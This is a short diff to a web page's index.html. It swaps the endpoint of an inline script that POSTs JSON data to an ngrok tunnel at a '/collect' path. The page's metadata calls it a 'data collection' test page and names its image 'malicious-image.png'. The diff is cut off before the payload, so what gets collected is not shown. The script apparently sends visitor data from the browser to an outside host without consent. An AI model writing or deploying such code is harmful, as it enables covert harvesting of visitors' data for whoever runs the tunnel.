--- a/index.html
+++ b/index.html
@@ -8,7 +8,7 @@
     <meta property="og:description" content="Test page for data collection" />
     <meta property="og:image" content="https://example.com/malicious-image.png" />
     <script>
-        fetch('https://f082-88-164-232-183.ngrok-free.app/collect', {
+        fetch('https://2f9e-88-164-232-183.ngrok-free.app/collect', {
             method: 'POST',
             headers: {
                 'Content-Type': 'application/json'
